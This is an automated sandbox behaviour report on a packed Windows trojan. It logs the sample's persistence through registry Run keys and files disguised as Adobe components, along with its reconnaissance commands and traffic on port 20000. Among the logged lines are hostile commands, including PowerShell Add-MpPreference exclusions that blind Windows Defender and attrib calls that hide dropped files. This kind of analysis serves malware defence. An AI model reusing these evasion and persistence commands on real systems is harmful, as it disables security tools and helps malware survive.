Source: C:\Windows\acrotray.exeProcess created: C:\Windows\System32\cmd.exe cmd /C "powershell -Command Add-MpPreference -ExclusionPath C:\Users\user\AppData\Roaming\Microsoft"
Source: C:\Windows\acrotray.exeProcess created: C:\Windows\System32\reg.exe reg add "HKCU\Software\Mystic Entertainment" /f
Source: C:\Windows\acrotray.exeProcess created: C:\Windows\System32\cmd.exe cmd /C "wmic path win32_VideoController get name"
Source: C:\Windows\acrotray.exeProcess created: C:\Windows\System32\cmd.exe cmd /C ver
Source: C:\Windows\acrotray.exeProcess created: C:\Windows\System32\cmd.exe cmd /C "wmic path win32_VideoController get name"
Source: C:\Windows\acrotray.exeProcess created: C:\Windows\System32\cmd.exe cmd /C whoami
Source: C:\Windows\acrotray.exeProcess created: C:\Windows\System32\cmd.exe cmd /C whoami
Source: C:\Windows\acrotray.exeProcess created: C:\Windows\System32\cmd.exe cmd /C "wmic cpu get name"
Source: C:\Windows\acrotray.exeProcess created: unknown unknown
Source: C:\Windows\acrotray.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\acrotray.exeProcess created: unknown unknown
Source: C:\Windows\acrotray.exeProcess created: unknown unknown
Source: C:\Windows\acrotray.exeProcess created: unknown unknown
Source: C:\Windows\acrotray.exeProcess created: unknown unknown
Source: C:\Windows\acrotray.exeProcess created: C:\Windows\System32\cmd.exe cmd /C whoami
Source: C:\Windows\acrotray.exeProcess created: unknown unknown
Source: C:\Windows\acrotray.exeProcess created: C:\Windows\System32\whoami.exe whoami
Source: C:\Windows\acrotray.exeProcess created: unknown unknown
Source: C:\Windows\acrotray.exeProcess created: unknown unknown
Source: C:\Windows\acrotray.exeProcess created: unknown unknown
Source: C:\Windows\acrotray.exeProcess created: unknown unknown
Source: C:\Windows\acrotray.exeProcess created: unknown unknown
Source: C:\Windows\acrotray.exeProcess created: unknown unknown
Source: C:\Windows\acrotray.exeProcess created: unknown unknown
Source: C:\Windows\acrotray.exeProcess created: unknown unknown
Source: C:\Windows\acrotray.exeProcess created: unknown unknown
Source: C:\Windows\acrotray.exeProcess created: unknown unknown
Source: C:\Windows\acrotray.exeProcess created: unknown unknown
Source: C:\Windows\acrotray.exeProcess created: unknown unknown
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath C:\Users\user\AppData\Local\Temp
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get name
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\whoami.exe whoami
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg add "HKCU\Software\Mystic Entertainment" /f
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\whoami.exe whoami
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\attrib.exe attrib +S +H C:\Users\user\AppData\Roaming\Microsoft\AdobeARM.exe
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic cpu get name
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get name
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get name
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get name
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\whoami.exe whoami
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\whoami.exe whoami
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\whoami.exe whoami
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\whoami.exe whoami
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
Source: C:\Windows\System32\wbem\WMIC.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Name FROM WIN32_PROCESSOR
Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Name FROM WIN32_PROCESSOR
Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Name FROM WIN32_PROCESSOR
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Name FROM WIN32_PROCESSOR
Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Name FROM WIN32_PROCESSOR
Source: C:\Windows\System32\attrib.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Name FROM WIN32_PROCESSOR
Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Name FROM WIN32_PROCESSOR
Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Name FROM WIN32_PROCESSOR
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\Documents\20220114Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_drkkekrp.vde.ps1Jump to behavior
Source: classification engineClassification label: mal100.troj.adwa.evad.winEXE@232/30@0/1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4348:120:WilError_01
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1904:120:WilError_01
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5568:120:WilError_01
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3732:120:WilError_01
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4432:120:WilError_01
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6116:120:WilError_01
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:720:120:WilError_01
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6200:120:WilError_01
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6000:120:WilError_01
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6732:120:WilError_01
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4936:120:WilError_01
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3348:120:WilError_01
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2260:120:WilError_01
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2248:120:WilError_01
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4484:120:WilError_01
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3180:120:WilError_01
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5388:120:WilError_01
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5616:120:WilError_01
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4960:120:WilError_01
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1864:120:WilError_01
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4768:120:WilError_01
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4632:120:WilError_01
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3932:120:WilError_01
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5536:120:WilError_01
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6196:120:WilError_01
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6592:120:WilError_01
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3752:120:WilError_01
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5016:120:WilError_01
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6088:120:WilError_01
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3696:120:WilError_01
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6240:120:WilError_01
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6068:120:WilError_01
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7080:120:WilError_01
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4828:120:WilError_01
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1312:120:WilError_01
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5924:120:WilError_01
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7120:120:WilError_01
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5624:120:WilError_01
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6488:120:WilError_01
Source: 5641e24e22ccd259f18585ed2cbbaf6be3b39a04b3c7e.exeString found in binary or memory: #/Add5
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
Source: 5641e24e22ccd259f18585ed2cbbaf6be3b39a04b3c7e.exeStatic file information: File size 1843200 > 1048576
Source: 5641e24e22ccd259f18585ed2cbbaf6be3b39a04b3c7e.exeStatic PE information: Raw size of UPX1 is bigger than: 0x100000 < 0x1c1c00
Source: 5641e24e22ccd259f18585ed2cbbaf6be3b39a04b3c7e.exeStatic PE information: section name: UPX2
Source: initial sampleStatic PE information: section name: UPX0
Source: initial sampleStatic PE information: section name: UPX1

Persistence and Installation Behavior:

barindex
Uses cmd line tools excessively to alter registry or file dataShow sources
Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
Source: C:\Windows\System32\cmd.exeProcess created: attrib.exe
Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
Source: C:\Windows\System32\cmd.exeProcess created: attrib.exe
Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
Source: C:\Windows\System32\cmd.exeProcess created: attrib.exe
Source: C:\Windows\System32\cmd.exeProcess created: reg.exeJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: attrib.exeJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
Source: C:\Windows\System32\cmd.exeProcess created: attrib.exe
Source: C:\Windows\acrotray.exeProcess created: reg.exe
Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
Source: C:\Windows\System32\cmd.exeProcess created: attrib.exe
Uses ipconfig to lookup or modify the Windows network settingsShow sources
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\ipconfig.exe ipconfig //flushdns
Source: C:\Windows\System32\cmd.exePE file moved: C:\Windows\acrotray.exerdJump to behavior

Boot Survival:

barindex
Creates an autostart registry key pointing to binary in C:\WindowsShow sources
Source: C:\Users\user\Desktop\5641e24e22ccd259f18585ed2cbbaf6be3b39a04b3c7e.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run acrotrayJump to behavior
Creates multiple autostart registry keysShow sources
Source: C:\Users\user\Desktop\5641e24e22ccd259f18585ed2cbbaf6be3b39a04b3c7e.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run acrotrayJump to behavior
Source: C:\Windows\acrotray.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run AdobeARM
Source: C:\Windows\acrotray.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run sidebar
Uses whoami command line tool to query computer and usernameShow sources
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\whoami.exe whoami
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\whoami.exe whoami
Source: C:\Windows\System32\ipconfig.exeProcess created: C:\Windows\System32\whoami.exe whoami
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\whoami.exe whoami
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\whoami.exe whoami
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\whoami.exe whoami
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\whoami.exe whoami
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\whoami.exe whoami
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\whoami.exe whoami
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\whoami.exe whoami
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\whoami.exe whoamiJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\whoami.exe whoamiJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\whoami.exe whoami
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\whoami.exe whoami
Source: C:\Windows\acrotray.exeProcess created: C:\Windows\System32\whoami.exe whoami
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\whoami.exe whoami
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\whoami.exe whoami
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\whoami.exe whoami
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\whoami.exe whoami
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\whoami.exe whoami
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\whoami.exe whoami
Source: C:\Users\user\Desktop\5641e24e22ccd259f18585ed2cbbaf6be3b39a04b3c7e.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run acrotrayJump to behavior
Source: C:\Users\user\Desktop\5641e24e22ccd259f18585ed2cbbaf6be3b39a04b3c7e.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run acrotrayJump to behavior
Source: C:\Windows\acrotray.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run sidebar
Source: C:\Windows\acrotray.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run sidebar
Source: C:\Windows\acrotray.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run AdobeARM
Source: C:\Windows\acrotray.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run AdobeARM

Hooking and other Techniques for Hiding and Protection:

barindex
Uses known network protocols on non-standard portsShow sources
Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 20000
Source: unknownNetwork traffic detected: HTTP traffic on port 20000 -> 49751
Hides that the sample has been downloaded from the Internet (zone.identifier)Show sources
Source: C:\Users\user\Desktop\5641e24e22ccd259f18585ed2cbbaf6be3b39a04b3c7e.exeFile opened: C:\Windows\acrotray.exe:Zone.Identifier read attributes | deleteJump to behavior
Source: C:\Windows\acrotray.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\sidebar.exe:Zone.Identifier read attributes | delete
Source: C:\Windows\acrotray.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\sidebar.exe:Zone.Identifier read attributes | delete | synchronize
Source: C:\Windows\acrotray.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\AdobeARM.exe:Zone.Identifier read attributes | delete
Source: C:\Windows\acrotray.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\AdobeARM.exe:Zone.Identifier read attributes | delete | synchronize
Source: C:\Users\user\Desktop\5641e24e22ccd259f18585ed2cbbaf6be3b39a04b3c7e.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Desktop\5641e24e22ccd259f18585ed2cbbaf6be3b39a04b3c7e.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\cmd.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\cmd.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\cmd.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\cmd.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\cmd.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\conhost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\conhost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
